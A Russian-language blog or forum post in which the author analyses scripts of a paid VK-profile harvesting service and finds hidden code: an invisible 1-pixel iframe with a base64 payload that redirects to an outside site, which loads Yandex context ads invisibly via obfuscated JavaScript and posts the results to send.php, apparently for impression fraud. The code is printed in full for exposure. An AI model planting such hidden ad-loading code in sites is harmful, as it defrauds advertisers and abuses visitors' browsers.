Доброго времени суток.
Недавно исследовал интересный сервис по сбору VK профилей:
Вход в сервис стоит 5000 рублей единоразово и 5 рублей за каждый собранный профиль человека.
Цель была узнать как и что работает при определении профиля человека, но речь пойдет не об этом. При тщательном ковырянии в работе скриптов нашел интересный кусок, который к определению имеет отношение примерно никакое 🙂
А нашелся собственно вот такой вот код
|
1 |
document.write('<iframe sandbox=\'allow-same-origin allow-scripts\' seamless id=\'sfrload\' src=\'data:text/html;charset=utf-8;base64,PCEtLSAtLT48c2NyaXB0IGFzeW5jPiB3aW5kb3cubG9jYXRpb24uaHJlZiA9ICJodHRwczovL3lvdTQzLnJ1L3lhbmRpbnRzaXRlLz91PWZiYjg5ZTM2YzM1OTJmMjIyMTZjZTMzM2Q4ZDFhMjUwIjsgPC9zY3JpcHQ+PCEtLSAtLT4=\' style=\'width:1px;height:1px;opacity:0;\'><\/iframe>'); |
Для тех кто не шарит: код вставляет на страницу 1 пиксельный прозрачный фрейм с таким содержанием(зашифрованным в base64)
|
1 |
<!-- --><script async> window.location.href = "https://you43.ru/yandintsite/?u=fbb89e36c3592f22216ce333d8d1a250"; </script><!-- --> |
Т.е. идет переадресация фрейма на адрес https://you43.ru/yandintsite/?u=fbb89e36c3592f22216ce333d8d1a250
И самое интересное находится по этому адресу
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
<!DOCTYPE html> <html><head> <title></title> </head> <script> self = null; parent = null; top = null; </script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> <body> <div id="none" style="display:none;"> <div id="Ya_sync_0"></div> <script type="text/javascript"> (function(w, d, n, s, t) { var _0x3f93=["\x59\x61\x5F\x73\x79\x6E\x63\x5F\x30","\x64\x69\x72\x65\x63\x74","\x66\x6C\x61\x74","\x46\x46\x46\x46\x46\x46","\x30\x30\x38\x30\x30\x30","\x34\x34\x34\x34\x34\x34","\x30\x30\x30\x30\x30\x30","\x69\x6E\x73\x65\x72\x74\x49\x6E\x74\x6F","\x44\x69\x72\x65\x63\x74","\x70\x75\x73\x68","\x73\x63\x72\x69\x70\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x2F\x2F\x61\x6E\x2E\x79\x61\x6E\x64\x65\x78\x2E\x72\x75\x2F\x73\x79\x73\x74\x65\x6D\x2F\x63\x6F\x6E\x74\x65\x78\x74\x2E\x6A\x73","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];w[n]=w[n]||[];w[n][_0x3f93[9]](function (){Ya[_0x3f93[8]][_0x3f93[7]](79933,_0x3f93[0],{stat_id:1,ad_format:_0x3f93[1],font_size:1,type:_0x3f93[2],limit:4,title_font_size:3,links_underline:true,site_bg_color:_0x3f93[3],title_color:_0x3f93[4],url_color:_0x3f93[5],text_color:_0x3f93[6],hover_color:_0x3f93[4],sitelinks_color:_0x3f93[4],favicon:true,no_sitelinks:true});} );t=d[_0x3f93[11]](_0x3f93[10])[0];s=d[_0x3f93[12]](_0x3f93[10]);s[_0x3f93[13]]=_0x3f93[14];s[_0x3f93[15]]=_0x3f93[16];s[_0x3f93[17]]=true;t[_0x3f93[19]][_0x3f93[18]](s,t);eval(_0x3f93); })(window, document, "yandex_context_callbacks"); </script> <div id="Ya_sync_1"></div> <script type="text/javascript"> (function(w, d, n, s, t) { var _0xea8b=["\x59\x61\x5F\x73\x79\x6E\x63\x5F\x31","\x64\x69\x72\x65\x63\x74","\x66\x6C\x61\x74","\x46\x46\x46\x46\x46\x46","\x30\x30\x38\x30\x30\x30","\x34\x34\x34\x34\x34\x34","\x30\x30\x30\x30\x30\x30","\x69\x6E\x73\x65\x72\x74\x49\x6E\x74\x6F","\x44\x69\x72\x65\x63\x74","\x70\x75\x73\x68","\x73\x63\x72\x69\x70\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x2F\x2F\x61\x6E\x2E\x79\x61\x6E\x64\x65\x78\x2E\x72\x75\x2F\x73\x79\x73\x74\x65\x6D\x2F\x63\x6F\x6E\x74\x65\x78\x74\x2E\x6A\x73","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];w[n]=w[n]||[];w[n][_0xea8b[9]](function (){Ya[_0xea8b[8]][_0xea8b[7]](79933,_0xea8b[0],{stat_id:1,ad_format:_0xea8b[1],font_size:1,type:_0xea8b[2],limit:4,title_font_size:3,links_underline:true,site_bg_color:_0xea8b[3],title_color:_0xea8b[4],url_color:_0xea8b[5],text_color:_0xea8b[6],hover_color:_0xea8b[4],sitelinks_color:_0xea8b[4],favicon:true,no_sitelinks:true});} );t=d[_0xea8b[11]](_0xea8b[10])[0];s=d[_0xea8b[12]](_0xea8b[10]);s[_0xea8b[13]]=_0xea8b[14];s[_0xea8b[15]]=_0xea8b[16];s[_0xea8b[17]]=true;t[_0xea8b[19]][_0xea8b[18]](s,t);eval(_0xea8b); })(window, document, "yandex_context_callbacks"); </script> <div id="Ya_sync_2"></div> <script type="text/javascript"> (function(w, d, n, s, t) { var _0xb689=["\x59\x61\x5F\x73\x79\x6E\x63\x5F\x32","\x64\x69\x72\x65\x63\x74","\x66\x6C\x61\x74","\x46\x46\x46\x46\x46\x46","\x30\x30\x38\x30\x30\x30","\x34\x34\x34\x34\x34\x34","\x30\x30\x30\x30\x30\x30","\x69\x6E\x73\x65\x72\x74\x49\x6E\x74\x6F","\x44\x69\x72\x65\x63\x74","\x70\x75\x73\x68","\x73\x63\x72\x69\x70\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x2F\x2F\x61\x6E\x2E\x79\x61\x6E\x64\x65\x78\x2E\x72\x75\x2F\x73\x79\x73\x74\x65\x6D\x2F\x63\x6F\x6E\x74\x65\x78\x74\x2E\x6A\x73","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];w[n]=w[n]||[];w[n][_0xb689[9]](function (){Ya[_0xb689[8]][_0xb689[7]](79933,_0xb689[0],{stat_id:1,ad_format:_0xb689[1],font_size:1,type:_0xb689[2],limit:4,title_font_size:3,links_underline:true,site_bg_color:_0xb689[3],title_color:_0xb689[4],url_color:_0xb689[5],text_color:_0xb689[6],hover_color:_0xb689[4],sitelinks_color:_0xb689[4],favicon:true,no_sitelinks:true});} );t=d[_0xb689[11]](_0xb689[10])[0];s=d[_0xb689[12]](_0xb689[10]);s[_0xb689[13]]=_0xb689[14];s[_0xb689[15]]=_0xb689[16];s[_0xb689[17]]=true;t[_0xb689[19]][_0xb689[18]](s,t);eval(_0xb689); })(window, document, "yandex_context_callbacks"); </script> <script type="text/javascript"> $(document).ready(function(){ setTimeout(function() { var c=document.getElementsByTagName('head'); c[0].parentElement.removeChild(c[0]); var y0 = $("#Ya_sync_0").html(); var y1 = $("#Ya_sync_1").html(); var y2 = $("#Ya_sync_2").html(); $.post("send.php", { html: y0+y1+y2, u: "fbb89e36c3592f22216ce333d8d1a250" }); $( "#none" ).remove(); }, 1000); }); </script> </div> </body> </html> |
На страницу подгружается в невидимом divе 3 блока контекстной рекламы яндекса.
Затем полученная реклама отправляется на некий скрипт send.php на этом же сайте.
Выходит за счет всех клиентов сервиса они откручивают показы своей рекламы и собирают результаты. Зачем собирать рекламу скриптом я не совсем понимаю, возможно для статистики.
В кратце выходит как-то так: в скрытом фрейме подгражается другой скрытый фрейм в котором отображается контекстная реклама.
К сожалению я никогда не ставил на сайты яндекс рекламу и не знаю считаются ли показы таким образом, а если считаются то получают ли они с показов доход.
Если получают то это как-то некрасиво выходит ибо клиенты и так платят за сервис хорошие деньги.
Если кто шарит расскажите реально ли получить за такие показы доход, просто интересно, а не для того чтобы так же делать 🙂